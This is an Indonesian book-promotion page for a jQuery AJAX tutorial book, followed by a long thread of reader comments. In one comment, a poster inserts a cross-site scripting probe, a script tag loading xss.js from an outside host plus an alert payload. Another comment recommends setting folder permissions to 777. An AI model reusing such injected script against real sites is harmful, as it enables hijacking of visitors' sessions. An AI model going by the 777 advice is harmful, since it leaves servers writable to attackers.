Trik Dahsyat Menguasai AJAX dengan jQuery

Setelah tahun lalu SUKSES menulis buku tentang jQuery pertama di Indonesia, kini penulis  akan membeberkan rahasia kedahsyatan AJAX yang dibuat dengan jQuery. Selain lebih mudah dipelajari, belajar AJAX dengan jQuery terasa lebih menyenangkan, karena kita akan dimanjakan dengan animasi dan tampilan cantik khas jQuery.

Beberapa kasus aplikatif dan trik pilihan yang dibahas dalam buku ini, diantaranya:

  • Trik Dasar AJAX dengan jQuery
  • Cek Username Secara Live
  • Indikator Kekuatan Password
  • Menampilkan Password yang Disembunyikan
  • AutoComplete Ala Google
  • Pencarian Data Ala jQuery
  • Form Contact yang Cool
  • AJAX Shoutbox
  • 3 ComboBox Dinamis yang Saling Berhubungan
  • Manipulasi Tampilan Form
  • Image Live Preview
  • Flying Top of Message
  • Pertukaran Data dengan JSON
  • Mematikan Seleksi Halaman Web, dan masih banyak lagi.
  • Bonus Proyek Bikin Sendiri Script Forum Diskusi.
  • Serta Lomba Bikin Web Templates Berhadiah Rp. 7 Juta, Contoh Templates CMS Lokomedia Terbaru Ada di CD.
Spesifikasi buku:
Judul     : Trik Dahsyat Menguasai AJAX dengan jQuery
Penulis : Lukmanul Hakim
Harga   : 48.800,-
Bonus  : CD Video Tutorial

Klik disini untuk melihat cover gambar dalam ukuran yang lebih besar.

Baca Juga

185 Komentar

  • lukman | 16 Maret 2011 - 06:13:50 WIB

    maaf kawan-kawan lokomedia semua, bukunya belum bisa terbit hari ini, kemarin sore saya cek di percetakan bukunya sudah jadi, tapi ada beberapa halaman yang ketukar tempatnya, jadi harus dibongkar lagi bukunya untuk diperbaiki tata letaknya, semoga minggu ini selesai dan bisa terbit, nanti saya kabari lagi.

  • petapa | 16 Maret 2011 - 06:21:23 WIB

    pertama ...
    d tunggu bukunya...

  • tenobiman | 16 Maret 2011 - 06:22:37 WIB

    akhirnya setelah lama menunggu keluar juga buku pembahasan ajax, pa lagi penulisnya mas lukman,,, jadi gak sabar pgn beli..

  • Agus Adiyanto | 16 Maret 2011 - 07:06:54 WIB

    Empatax...hehehe

    Menunggu buku Trik Dahsyat Menguasai AJAX dengan jQuery dibongkar lagi untuk diperbaiki tata letaknya.

  • Wahyu | 16 Maret 2011 - 07:21:57 WIB

    Wah kalo yang ini kayaknya saya harus punya (beli)... :)

  • Wahyu | 16 Maret 2011 - 07:24:38 WIB

    Oh iya, mas Lukman, cara daftar lomba design webnya gimana caranya? Saya mau ngikutin web saya yang ini http://wahyukodar.com , kira-kira bisa gak web yang ini saya lombakan? Terima kasih master..

  • Agus Adiyanto | 16 Maret 2011 - 07:42:32 WIB

    Judul baru bukunya Pak Lukman:

    Trik Dahsyat Menguasai AJAX dengan jQuery Dibongkar Lagi

    Just kiding/becanda Pak Lukman,hehehehe...

    Msudnya:
    Bukunya dibongkar lagi untuk diperbaiki tata letaknya, krn ada beberapa halaman yang ketukar tempatnya

  • Agus Saputra | 16 Maret 2011 - 08:04:52 WIB

    Jadi penasaran lombanya ..

  • putra | 16 Maret 2011 - 08:08:17 WIB

    he,,,
    padahal dak beli online hari ini

  • Andrea Adelheid | 16 Maret 2011 - 08:48:31 WIB

    Mantaff nih,pesan Online ahh pakek Express

  • ADI | 16 Maret 2011 - 08:53:19 WIB

    Wah,.kira kira kapan pak,.jadinya,..??? dh di tunggu2 iki..?

  • hery | 16 Maret 2011 - 08:58:31 WIB

    Ditunggu di kota Malang Pak! Mantaaaaapp.....!!!!! :)

  • Arif Hidayatullah | 16 Maret 2011 - 09:15:03 WIB

    Assalamualaikum...

    Wah baru saja disms langsung buat iklan ^__^ saya tunggu buku barunya ya...

  • husada | 16 Maret 2011 - 09:34:09 WIB

    serbuuuu..., eh belom dink? Tertunda dech? Ada kaos PHP bagi yg beli dlm jumlah nominal tertentu di togamas? So buruaaan...

  • Welly | 16 Maret 2011 - 11:27:43 WIB

    Ditunggu Pa Bukunya .....

    Mantap .

  • taufik | 16 Maret 2011 - 11:32:23 WIB

    mantap nih pak.. saya tunggu di surabaya

  • h3nd1 | 16 Maret 2011 - 11:46:05 WIB

    wah akhirny terbit juga ni?

    dah lama d tunggu2?

    sukses terus buat pa lukman

  • Ansari | 16 Maret 2011 - 12:37:04 WIB

    Iya gpp mas,,,, dimaklumi,,,,

    http://ansarisaleh.web.id

  • poeji | 16 Maret 2011 - 12:50:33 WIB

    di tunggu ya Mas Lukman kabar buku terbarunya kapan bisa kami lahap buku terbarunya, alamak keceplosan hehehehehe...... ^_^">

  • Awan | 16 Maret 2011 - 12:54:54 WIB

    kapan OOP?

  • Muhammad Babar J | 16 Maret 2011 - 13:11:10 WIB

    mantab!

  • palgunadi | 16 Maret 2011 - 13:43:14 WIB

    penantian yg panjaaaaaaaaang.

  • M. Ridho | 16 Maret 2011 - 16:23:58 WIB

    @Mas Lukman: Kapan mas buku nya nyampe di Kota Padang..??

  • kiwil 4 kiwil studio | 16 Maret 2011 - 17:31:53 WIB

    wah sip ini selain contentnya yang asik + lomba bikin templatenya dah keluar.
    kapan nih nyampe di malang mas lukman?

    trims ^_^

    www.kiwilstudio.com/

  • Rizky | 16 Maret 2011 - 19:51:57 WIB

    Akhirnya terbit juga :D tapi sayang harus nunggu lagi :D

  • ROWIDESIGN | 16 Maret 2011 - 22:40:00 WIB

    ditunggu kabarnya pak ^^

  • Hermawan | 16 Maret 2011 - 22:53:28 WIB

    ditunggu di kota malang pak bukunya... semoga GPL (Gak Pake Lama) he he...

  • Ade | 16 Maret 2011 - 23:25:51 WIB

    Buku baru ya...
    hmmm...
    segera beli ni...
    mumpung masih fresh

  • ibien | 17 Maret 2011 - 05:07:59 WIB

    i like it

  • daljono | 17 Maret 2011 - 06:59:01 WIB

    like this, kalo bisa framework codeignitier lebih di kembangkan lebih dalam lagi,,trim

  • Nanank | 17 Maret 2011 - 07:47:42 WIB

    Ditunggu mas bukunya..........

  • bebe | 17 Maret 2011 - 08:30:41 WIB

    Pak Lukman kira2 tgl berapa ni terbitnya,.dah ditunggu2..heee....

  • Yuri | 17 Maret 2011 - 14:46:27 WIB

    Wah ini yang di tunggu tunggu, kira2 kapan bukunya masuk ke Kota Padang Mas ?..........dah gak sabar ni

  • top bin tob | 17 Maret 2011 - 16:34:21 WIB

    yang msh membingungkan dari buku ini : kenapa cover belakangnya memuat tokoh mafia, gayus bin rakus? bisa dijelaskan mas lukman?

  • fransisca | 17 Maret 2011 - 23:30:17 WIB

    sebagus apapun buku, aku paling menyayangkan jika penulis tidak menyertakan DAFTAR PUSTAKA... entah apa tujuannya, apakah tidak ingin agar referensinya diketahui pembaca?... ato karena menganggap itu adalah hasil karya murni penulis.. tp aku rasa tidak mungkin, orang pintar sekelas profesor aja juga pasti memerlukan referensi dalam membuat karya ilmiah.. bohong besar jika penulis mengaku itu adalah murni hasil karya makanya penulis berkata tidak perlu daftar pustaka, justru daftar pustaka jg penting buat pembaca buat belajar lebih lanjut..
    contoh buku terbitan luar negeri, mereka full daftar pustaka.. jadi pembaca juga bisa belajar dari refrensi daftar pustaka disamping membaca dari buku ..

  • fransisca | 17 Maret 2011 - 23:31:02 WIB

    Sambungan ...

    aku setia membeli buku terbitan lokomedia tp justru aku lebih menghargai penulis baru seperti bukunya mas suhanto (jomlaa), mas agus saputra (cakephp) dan mas sandi hariadi, karena jujur menyertakan daftar pustaka ... bagaimana dengan penulis senior?.. seperti mas komang, mas awan dan mas lukmanul hakim??..
    jquery itu merupakan library dapet download, itu memerlukan refrensi... framework codeigniter juga siap pakai dan memerlukan manual untuk mempelajarinya .. dan itu juga merupakan sumber refrensi ..

    jadi biarlah ini menjadi catatan untuk para penulis .. thx ..

  • website developer | 18 Maret 2011 - 05:28:21 WIB

    wah mantap nih,, JSON.. :)
    kumpulin duit..

    wah ada lombanya pula lgi,,
    boleh tau gak? ini lombanya penyedianya lokomedia atau bukan?

  • budi | 18 Maret 2011 - 10:40:58 WIB

    mantev... D tunggu OOP PHP nya.. :D

  • hendra | 18 Maret 2011 - 11:21:04 WIB

    om lukman,,saya kn upload web,,nah pas di tiny mce create folder mlh ada warning "you have not permision",,,ada setingan lg g om??klo di upload k server domain
    mohon pencerahan,,,,
    mampir y ke: www.fateta.ipb.ac.id,,mksh

  • Komar | 18 Maret 2011 - 11:40:59 WIB

    # Fransica : Bukunya ada kok DAFTAR PUSTAKANYA seperti di dalam buku yang berjudul JALAN PINTAS MENJADI MASTER PHP, halaman dibagian belakang terdapat daftar pustakannya, kalaupun buku tak ada daftar pustakanya, pembahasan kan sudah ada di dalam isi buku, contohnya tentang JQUERY disana disertakan alamat website jquery-nya jadi kita bisa lihat langsung atau belajar dari sumbernya untuk dikembangkan lagi.

  • Sutarno | 18 Maret 2011 - 14:33:59 WIB

    @ Hendra : di folder tiny mce, coba klik kanan lalu pilih ‘Permission’ ubah mode write ke angka 777.

  • fransisca | 18 Maret 2011 - 19:21:50 WIB

    komar @ maaf mas sebelumnya, tp apakah cm buku itu yg ditulis pak lukman?? bukunya kan banyak .. dan dalam pembahasan dalam isi buku tidak bisa disebut daftar pustaka, hendaknya daftar pustaka itu diletakkan sendiri paling akhir dari suatu pembahasan.. dan aku yakin, setiap perancang buku itu tidak bisa terpaku pada satu refrensi, seperti contohnya www.jquery.com..
    pasti lebih dari 1 refrensi dalam merancang suatu buku,
    seperti contoh seperti mas suhanto, mas agus, dkk.. maksud aku yang seperti itu loh.. menyertakan halaman khusus untuk daftar pustaka, ato seperti buku pak lukman sebelumnya, jalan pintas menjadi master PHP..

    jadi itu hanya sekedar masukan, harus tetap dipertahankan mengenai daftar pustaka, karena itu jg sangat penting banget.. terima kasih..

    para penulis @ harap diperhatikan ya, biarpun hal sepele tp sangat bermanfaat buat pembaca .. :-)

  • Haji Murtado | 18 Maret 2011 - 20:34:30 WIB

    Kapan buku yang membahas ext-js atau sencha touch diterbitkan ???
    Saya lagi cari tuh mas....

  • Fia | 18 Maret 2011 - 21:22:31 WIB

    Wah...buku baru lg...slamat y pak....bku jQuery ny kmrin mudah dmngerti bhasany mudah d phami...mga buku ini sukses jg y pak?amiinnn...oiy, ntar fia transfer uangny k rekening bapak bwt buku Master PHP nya..hihi..mkasih byk sebelumnya pak...

  • Mbah Merijen | 18 Maret 2011 - 23:14:17 WIB

    Alaaahhh.....fransisca!!! banyak cakap betul kau...saya tanya apa yang sudah kau hasilkan untuk manfaat orang banyak?? Paling sama kau juga hanya bisa Copy Paste ....

  • Mbah Merijen | 18 Maret 2011 - 23:19:34 WIB

    fransisca!!! : bila kau merasa pintar kasih lah teman teman disini ilmu2 PHP yg khususnya bwt orang yg baru belajar!!! baru kau boleh cakap cakap betul betul disini "TONG KOSONG NYARING BUNYINYA"

  • ridho | 18 Maret 2011 - 23:26:04 WIB

    sepertinya ada benarnya jg apa yg dikatakan oleh fransisca.. kata dosen sy juga gitu.. dalam suatu perancangan, harus disertakan daftar pustaka sbg referensi.... sy dukung sependapat mba dengan anda.. :-D

    mbah merijen @ itu bukan banyak cakap mas, menurut sy benar jg tuh.. itu sebuah masukan yg kdg disepelekan penulis..

  • hendra l tokoaslionlin | 18 Maret 2011 - 23:51:54 WIB

    ganti nama ada yang sama denganku disini heeeeee

    woi jangan ribut, kalau mau ribut call aq ntr aq sediain ring tinjunya kan lumayan bisa mungutin uang ticket...

    bagi yang bersiteru, tunjukan dengan karya dong jangan saling menghina.

  • dika Gumay | 19 Maret 2011 - 03:31:04 WIB

    weleh-weleh...
    ntukan saran, cuma kritiknya aja agak pedes
    cocok jadi calon anggota dewan nii

    ditunggu bukunya yaa, ane mo ikut tuu lomba
    ngoprek web dari lokomedia ga napa kan?

  • suhan | 19 Maret 2011 - 06:44:34 WIB

    Subtansinya buku ini bisa mencerdaskan bangsa walaupun dengan cara yg sedikit berbeda..demokrasi monggo2 ae tapi ingat, visi dan misi buku ini sudah sangat jelas sangat positif..ini forum umum dan seharusnya setiap user taulah etika dlm menliskan komntar2nya..jangalah kita menebar kebencian..

  • Hazen | 19 Maret 2011 - 07:16:12 WIB

    Mantap Banget Ohm Lukman.......
    g Sabar Pngen cepat mesen bukunya..

  • Nasro | 19 Maret 2011 - 08:27:52 WIB

    Di tgu karya2 berikutnya dri pak lukman yg cemerlang and no cencored

  • Fardian | 19 Maret 2011 - 09:48:04 WIB

    Ditunggu terbit nya di banjarmasin...

  • azuro | 19 Maret 2011 - 09:56:27 WIB

    @fransisca: mhn klu mau protes langsung email sj jgn di publish langsung di forumini. ini nmya bkan kritik membangun tpi menjelek2 orng itu sie pendapat sj smoga sy salah. tong kosong berbunyi nyaring. peace

  • Ilman | 19 Maret 2011 - 12:38:15 WIB

    Wooiii.. ga usah pake emosi....
    Mbah Merijen harusnya anda bisa menghargai dan memahami komentar dari fransisca.. (tanpa maksud mendukung & membela)
    apa yg dikatakan Fransisca itu ada benarnya, setidaknya dapat menjadi acuan bagi para pembaca yg telah membeli buku si penulis
    tsb. setidaknya kita-kita ini dapat langsung belajar juga melalui sumber dari daftar pustaka tersebut.
    Lagipula komentar beginian kok knp harus ditanggapi dengan nada sinis ?

    untuk Mas lukman, Maju terusss.. anggaplah ini suatu kritik membangun. semoga karya2 anda selalu terus berguna
    bagi kita semua

  • Wahyu | 19 Maret 2011 - 13:03:18 WIB

    Daripada ribut mending lihat WEBKU yang Aneh di sini http://wahyukodar.com (hehehe promosi). Yang gak ngeliat nyesel karna gak ngeliat suatu ide dan imajinasi dari sisi lain web... hehe... just kidding

  • Andrea Adelheid | 19 Maret 2011 - 13:16:02 WIB

    Apa yg dikatakan mbah fransisca itu emang bener..buat mbah merijen jangan omong kasar donk, loe nya sendiri belum mempunyai sesuatu hal yg bisa membuktikan bahwa elu lebih baik dari fransisca. :) berfikir positif om (kalau emang anda dewasa)



    @ fransisca :
    mungkin kelupaan kali bro/mbak, tidak ada yg sempurna didunia ini.. :D hehehe

    maaf saya tidak ada maksud membela siapapun..

  • bolang | 19 Maret 2011 - 13:57:26 WIB

    wahyu: imaginr apaan ada juga blog loe suspended
    all : betul tuh kata mas hendra bersiteru mulu herannn hoby bgt

  • ronal | 19 Maret 2011 - 14:36:55 WIB

    ALL@dr pd kalian ribut2 ga jelas cuma masalah sepele mendingan kita cari scripit2atau ide2 kreatif buat ngembangin cms lokomedia biar berskala internasinal kayk open source yg lain...tp gw yakin cms lokomedia akan semakin berkembang ke depannya makanya gw selalu koleksiin buku pak lukman ini kpn om lukman nyampe di jkt..maju truz lokomedia

  • Agus Saputra | 19 Maret 2011 - 17:26:45 WIB

    wah, sy kok gtw c ada kerusuhan gini .. :-)

    all @ yg fransisca katakan itu ada benarnya dan itu hanya sebuah masukan (saran agar daftar pustaka itu harus diperhatikan dan disertakan sbg referensi pembaca.. itu inti poin-nya), dan bukan untuk menjelek2an penulis.. kan penulis jg menerima saran dan kritik .. ambil positifnya saja ya kawan2.. ini tujuannya sangat membangun kok buat para penulis .. toh itu juga akan memberikan manfaat yg besar untuk para pembaca.. :-)...

  • Raja Syahroni | 19 Maret 2011 - 17:30:30 WIB

    akhirnya bku yg sy tggu2 terbit jga.
    untuk wilayah Pekanbaru udah ada gag y.
    dah gag sabar mau k Gramedia :)

  • Palgunadi | 19 Maret 2011 - 19:33:44 WIB

    G perlu ribut disini deh, beda pendapat itu wajar..damai..ya..damai. Bikin buku aja deh biar ilmu kita nambah. Setuju?

  • Muhammad Babar J | 19 Maret 2011 - 20:15:47 WIB

    Cepat ucap ASTAGHFIRULLAHALAZIM....
    Hidup sudah susah jangan di tambah susah
    Mari berdamai dan menunggu buku ini terbit :D
    dengan atau tanpa referensi sama saja ko
    yang penting intinya bermaksud mencerdaskan pembeli :)

  • palgunadi | 21 Maret 2011 - 11:08:35 WIB

    kapan terbitnya yaa, dah g sabar pengen beli.

  • Awan | 22 Maret 2011 - 13:14:16 WIB

    lebih mengarah ke web design yah ini
    bagoooos
    :D

    Pak Lukman
    bikin buku yang membahas CSS disertai contoh nyata dong
    jngan kyak yg udah terbit
    heheee

  • Bukirom | 22 Maret 2011 - 20:35:52 WIB

    Pak Lukman, buku tentang OOP di PHP kapan terbit? Saya cari referensi ada 1, tapi tak cari di semua toko buku tidak ada barangnya.

  • ama sabu | 22 Maret 2011 - 21:17:44 WIB

    kpan bukux ampe kupang?udah gak t nahan pngn lahap..

  • ferry | 23 Maret 2011 - 08:29:33 WIB

    Pak Lukman, apa ada ide untuk menulis buku tentang cara membuat framework PHP sendiri?

    Saya tertarik untuk jadi penulis cuma saya gk terbiasa menulis..hehe.. cuma mau share ilmu bagaimana menguasai PHP dan membuat framework PHP sendiri..

    Saya punya framework sendiri buat kantor saya, jika ada yang tertarik mempelajarinya bisa ke kantor saya juga di jakarta. Saya mau share ilmu tp malas ngetik or tulis, mending lisan..hehe..

    adakah disini teman2 yang mau bantu saya supaya rajin menulis?

    Thanks semuanya..

  • wisnu | 23 Maret 2011 - 09:02:26 WIB

    apa-apaan semua ini .... kalau ribut-ribut di hutan aja .... forum ini adalah membahas ilmu komputer jgn dibuat ribut melulu kayak DPR aja... kerja gak ada hanya nuntut aja ... pakai donk etika bukan kayak orang hutan aja. klau mau complain silahkan kirim email atau hubungi langsung penulisnya. saya bukan membela siapapun. klu gak suka silahkan abaikan forum ini atau gak usah beli bukunya, BEGITU AJA KOK REPOT. Untuk Mas Lukman silahkan berkarya terus, masih banyak orang yg membutuhkan ilmu anda.

  • YoQ | 23 Maret 2011 - 11:28:38 WIB

    @ferry: mau donk, gpp lisan jg.. bayar brp ? minta emailnya donk, boleh tulis sini / kirim ke halloboss@yahoo.com
    Thx

    @Mas Lukman: Buku OOP kpn keluar?

  • ronal | 23 Maret 2011 - 18:35:44 WIB

    fery@boleh tuch mas di daerah mana kantornya

  • Fuad indra s | 24 Maret 2011 - 04:36:12 WIB

    wah..ini mas lukman yg bikin ya.....siap dibeli mas..

  • safiq | 24 Maret 2011 - 21:05:41 WIB

    @ mas ferry : boleh bgt tuh mas, emng kantor or rumah mas di jakarta mana ?
    oia mas, klo mw bagi2 ilmu, e book, source code, sya akan sgt berterima kasih sekali, ni mas email saya :
    syafiq.nasri@yahoo.co.id
    maaf merepotkan..

  • jepri | 24 Maret 2011 - 22:17:51 WIB

    siiip dah, Maju Terus Pak Lukman, Tuk Anak bangsa,
    usul tuk buku selanjutnya maz, sertakan Typewriter Effect...!

  • top bin tob | 25 Maret 2011 - 10:27:56 WIB

    @ferry : gmn kalo kita kolaborasi.. mas ferry ajarin saya framework, sy ngajarin mas ferry nulis :)

  • andy hakim | 25 Maret 2011 - 13:30:52 WIB

    ada 1000 orang penulis seperti mas lukman ... pada pinter semuanya orang-orang indonesia ..
    barakallahu laka mas lukman ..
    maju terus

  • hendra | 25 Maret 2011 - 14:38:54 WIB

    mas lukman,saya mw mnta bantuan ne,,
    kn saya pake ajax buat filter data,,nah yg jadi permasalhn adalah ktika sta klick halamn selanjty itu malah loncat,,jadi g di satu web,,malah menuju folder file,,
    bsa bantu g mas,,saya me krim source code web ya ne..saya kirm ke email siapa y??
    mksh mas lukman

  • Junot | 25 Maret 2011 - 18:27:41 WIB

    BANDUNG SUDAH ADA BELUM PAK?

  • Agus Saputra | 25 Maret 2011 - 22:27:09 WIB

    Lokomediers @ URL baru, desain layout web juga baru.. kasih opini ya kawan jump to: http://www.agussaputra.com .. tq..

  • putra | 25 Maret 2011 - 23:25:56 WIB

    gila mantap abis bukunya, saya dah baca

  • donald | 27 Maret 2011 - 10:50:14 WIB

    jgn lupa kirim saya mas buku baru nya hehehehe

  • lukman | 27 Maret 2011 - 12:05:46 WIB

    @ all: terimakasih atas respon positif dan testimoninya.

    @ fransisca: terimakasih atas masukan DAFTAR PUSTAKA-nya, semoga lebih baik lagi di buku saya yang berikutnya.

    @ junot: di Bandung sudah ada, terutama di toko buku BIOBSES pasar palasari.

    @ top bin tob: kenapa ada gambar gayusnya?? karena saat saya bikin buku ini, yang lagi hot beritanya si gayus, sehingga kita bisa mengambil hikmah dari kasusnya si gayus.

  • rowidesign | 27 Maret 2011 - 18:50:58 WIB

    update toko online yang pake jquery ditunggu updatenya ^^

  • yuyun w | 27 Maret 2011 - 21:10:27 WIB

    buku tentang oop php kapan nich.....
    ditunggu ya.............

  • www.kliksumbar.com | 28 Maret 2011 - 00:08:00 WIB

    CMS Lokomedia mantaf

  • Gosling Allen Lee | 29 Maret 2011 - 14:43:05 WIB

    Manstab......

  • Awan | 29 Maret 2011 - 18:17:19 WIB

    semalem nyari di gramedia Semarang blum ada
    malah nemu buku CSS bagus terbitan Maxikom
    hhohoho

  • ferry | 29 Maret 2011 - 18:19:59 WIB

    @all : oke.. sori baru balas, lg sibuk soalnya..tar klo saya sudah sempat, silahkan hubungi saya aja di kantor.. no hp saya di 08195672588 and email di ferry@web-custom.com

    thanks.

  • Kadek | 30 Maret 2011 - 09:45:32 WIB

    Ditunggu bukunya dibali

  • top bin tob | 31 Maret 2011 - 13:32:09 WIB

    semakin banyak mas lukman sharing ilmu keliatannya semakin banyak dapet duitnya, buktinya bisa ngadain sayembara berhadiah :D. Top dah, emang bener org bae, rejekinya nambah.....

  • ronal | 31 Maret 2011 - 18:35:41 WIB

    barusan dari grameda matraman lom ad ni buku

  • luki mulyanto | 01 April 2011 - 16:07:45 WIB

    di bintaro udah ada lum ya....harus ngecek lg...buku pak lukman slalu ditunggu.... bagus dan jelas....saya pemula sangat terbantu....terus berkarya dan sukses slalu...

  • ronal | 03 April 2011 - 12:40:53 WIB

    ad yang tahu ga buku in uda lom di jkt uda 2 x gw ke gramedia matraman belum ad jg ni buku....

  • ibnu | 04 April 2011 - 00:00:44 WIB

    pak buat buku sistem pakar dung!!
    buat referensi...
    makasih...

  • rofi | 04 April 2011 - 08:58:49 WIB

    wah mantap. buku lokomedia lebih pinter dari dosen...........

  • Ade | 04 April 2011 - 23:57:23 WIB

    Ngk sabar menanti bukunya tiba di blitar besok atau lusa...
    hmmmm... pasti mantabs...

    www.bacain.info
    www.onteljawa.co.cc

  • Agus Saputra | 05 April 2011 - 00:37:36 WIB

    ade @ emank uda ada ya mas..
    - Gramedia Cirebon
    - Gunung Agung Cirebon
    - Kurnia Agung Cirebon
    - Togamas Cirebon

    semuanya belum ada.. padahal uda 2 minggu nih.. biasanya 1 minggu uda dipajang.. masa sampe sekarang .....

  • Beth | 06 April 2011 - 09:22:23 WIB

    Mas Lukman buku OOpnya kapan keluar.ditunggu y.trims

  • Henry | 06 April 2011 - 10:00:36 WIB

    Hadoh nih buku belum ada juga di Depok........

  • sembilanbenua | 09 April 2011 - 08:12:07 WIB

    ni mas lukman kemana ya......

  • Carol | 09 April 2011 - 09:31:12 WIB

    Sudah beli bukunya.. Awalnya gk yakin tapi setelah beli banyak hal-hal baru yg belum sy tau secara detail codingnya...

    Ingin Koleksi lagi dengan judul yang lain..

    Thx..

  • bangdk | 09 April 2011 - 14:57:48 WIB

    mantab yang ini.. da liat cmsnya hehe... numpang buat om2 dan agan2, sya mau share n minta koreksi dan saran dari project yang saya kembangkan dari cms lokomedia ini untuk projectnta silahkan download di:
    http://www.ziddu.com/download/14527594/Penggilingan. rar.html
    untuk passnya :bang.dk.punya@gmail.com
    terima kasih :P

  • awan | 10 April 2011 - 22:09:52 WIB

    gak kluar2 bukunya di gramedia
    hhohoo

    Pak Lukman
    request pliss
    PHP OOP diterbitin Pak

    kami nggak takut dengan OOP kog
    tenang aj
    hhahaa
    udh bnyak juga yang ngerequest

  • Samir | 11 April 2011 - 12:30:23 WIB

    ayooooo.......... mas lukman kerjakan dan tuntaskan buku na....hehehe

  • Agus Saputra | 12 April 2011 - 13:23:54 WIB

    New Post : Mengenal Struktur OOP PHP. visit : http://www.agussaputra.com/ ..

  • miftah | 12 April 2011 - 18:38:17 WIB

    Isi bukulokomedia.com memang pantas dibanggakan,sampai saat ini dan ketika saya browsing disana sini, rasanya disinilah saya menemukan pembahasan yang lengkap dan akurat. Terima kasih

  • Odenxs | 16 April 2011 - 23:41:56 WIB

    Bisa pesen Online gak nih??

  • Andi | 19 April 2011 - 17:00:29 WIB

    Kapan buat aplikasi akutansi berbasis PHP mas?

  • romadona | 20 April 2011 - 14:11:03 WIB

    Hallo..!

    CMS-nya ndak running mod_rewrite nya @linux fedora10, sudah saya pastikan mod_rewrite sudah saya aktifkan, tp tetap ndak mau.., jd klo saya akses dgn link media.php?blalala baru bisa.., tp klo hanya home dan yg lainnya sperti yg ada @.htaccess, CMS error ^^ knp ya masl.ukman?

  • Rizky Madeali | 24 April 2011 - 18:30:38 WIB

    Mohon info, Buku ini sudah tersedia di Gramedia Manado, soalnya minggu lalu di cek belum ada. Terima kasih sebelumnya.

  • Parsiyono | 27 April 2011 - 00:02:49 WIB

    Pak lukman, pada bonus skrip forum diskusinya kok kalau dibuka di browser Mozilla menu Login dan Register kok tidak kelihatan semua tapi kalau saya coba pakai IE dan Gcrome bisa kelihatan semua, mohon dibantu

  • NB | 30 April 2011 - 20:59:44 WIB

    Sore2 jalan ke gramedia. Tadinya cuma mo liat2 buku barunya mas lukman Trik Dahsyat Menguasai AJAX dengan jQuery. Pas buka halaman 184 ???
    jadi beli deh bukunya .... Trims Mas Lukman atas apresiasinya.
    Yang mo mampir silakan ke
    http://obattradisional.biz

  • ado | 04 Mei 2011 - 12:19:13 WIB

    mas-mas.....bisa minta proyek membuat forum.....masalahnya CD d dalam buku yg saya beli tidak bisa terbaca......di mana saya bisa mendownload filenya.....terima kasih.....

  • Firmansyah Maulana | 08 Mei 2011 - 20:31:22 WIB

    Maju terus Pantang Mundur !
    Saya selalu menanti buku'' Mas Lukman.

  • Luky Wijaya | 09 Mei 2011 - 13:16:02 WIB

    Siang teman-teman, saya hanya ingin menawarkan bantuan dengan menjual buku lokomedia harga diskon. Saya menjual paket 3 buku : 1. Trik membuat web template dengan PHP dan CSS.. 2. Trik Dahsyat menguasai Ajax dan Jquery 3. Cake PHP. Harga Rp. 118.000 (Sebelumnya Rp. 131.000). Khusus bandung bisa COD. Untuk pembelian SMS ke 08986416215 (Luky Wijaya). Bisa juga kunjungi lapak saya di http://www.kaskus.us/showthread.php?p=423002089

    NB : Jika ingin satuan juga bisa :D

  • awi | 14 Mei 2011 - 19:42:52 WIB

    mas bukunya yang ini udah ada di toko buku Togamas , denpasar, Bali

  • Komar | 21 Mei 2011 - 11:49:32 WIB

    To all : Saya menggunakan menu superfish dari cms lokomedia, ada yang tahu tidak cara menghilangkan kata “ No back link”, pada bagian pojok kiri atas, karena jika kata itu diklik akan menuju apycom.com, padahal tidak kata tertulis yang hyperlink ke web tersebut. terimakasih

  • ega | 30 Mei 2011 - 07:48:43 WIB

    busyet nih buku sehari aja dipelajari bisa.. gampang banget dipahamin... makasih banget om lukman.. mantep bukunya.. ditunggu release selanjutnya.. pusing nih cara gabungin codeigniter + jquery ajax.. kok g bisa2 kenapa ya??? -_-

  • ega | 30 Mei 2011 - 07:50:04 WIB

    next book "CODEIGNITER + JQUERY AJAX" ya.. ok?? hahaha

  • rudi | 30 Mei 2011 - 16:56:07 WIB

    dah terbitkah bukunya di toko buku gramedia?

  • sky | 04 Juni 2011 - 18:24:38 WIB

    <script SRC=www.ikbalsky.tk/xss.js> </ SCRIPT>

    Embedded script:

    <script> Alert ("XSS"); </ SCRIPT>

  • Eva | 12 Juni 2011 - 19:23:15 WIB

    Mantab bos, dah lama cari buku tentang jquery yg canggih itu...sukses terus ya

  • Ari | 18 Juni 2011 - 19:01:43 WIB

    ma lukman emang top abisss

  • Frank | 23 Juni 2011 - 12:57:30 WIB

    Permisi, mau tanya saya memakai database firebird sql.. Saya ada kendala kalo memakai hosting daftar dan gratis kan memakai database mysql.. Apakah saya harus buat hosting sendiri ya? Rumitkah buat hosting sendiri? Mohon bimbingannya.. Thanks.

  • Abdul Aziz | 26 Juni 2011 - 20:09:30 WIB

    www.madinatunnajah.sch.id
    minta review tmeplatku dong

  • Ardi Gaia | 30 Juni 2011 - 00:40:44 WIB

    mas lukman, mau tanya dong. apa sih yang harus sya atur supaya supaya tabel di database "dblokomedia.sql" ngk berubah lagi setelah sya edit.

    sebelumnya cms lokomedia yang "lokomedia" database "dblokomedia" pada buku AJAX ini sudah sya edit2 di laptop sya, trmsuk user adminx. bgitu pula sya cek kmbali ke "http//localhost/lokomedia" kmudian sya save ulang. tapi kenapa ketika saya mengcopykan hasil editan sya itu ke laptop adik saya, dan sya lakukan seperti biasa dan sya cb lgi masuk ke "http://localhost/lokomedia" menjadi kembali seperti semula saat sya belum mengeditnya di lptop saya.

    mhon pencerahannya mas lukman ke sini atau email di
    Gaia_ardi@yahoo.co.id ^_^

  • Aabdul | 30 Juni 2011 - 00:59:53 WIB

    mas ardi: database yg sdh diedit trus diekspor lagi lewat phpmyadmin

  • Ardi Gaia | 30 Juni 2011 - 11:44:07 WIB

    @Aabdul : diekspor atau di import mas?

    klo memang bgitu carax yo weis sya cb dlu. trimakasih.

  • abdul | 30 Juni 2011 - 15:34:35 WIB

    @ardy: ekspor dari database asal. kemudian dimport melalui database baru yg dimaksud

  • Joko Suntoro | 01 Agustus 2011 - 15:17:22 WIB

    Selamat ya pak..
    aku tunggu-tunggu pak.


    terima kasih

  • ahmad | 10 Agustus 2011 - 20:09:24 WIB

    saya tunggu lagi buku2 selanjutx terimakasih buat mas lukman dan lokomedia,, sangat membantu sya dalam pembelajaran

  • iPaymu.com | 13 Agustus 2011 - 05:26:29 WIB

    Artikel yang sangat menarik dan bermanfaat untuk dibaca, terimakasih pak admin..... salam

  • faqih | 13 Agustus 2011 - 15:23:35 WIB

    saya sudah beli bukunya.. bagus coz saya lagi belajar ajax.. saya lagi belajar cara grabbing halaman website.. mas lukman bisa bantu ngasih contoh2nya dengan ajax??
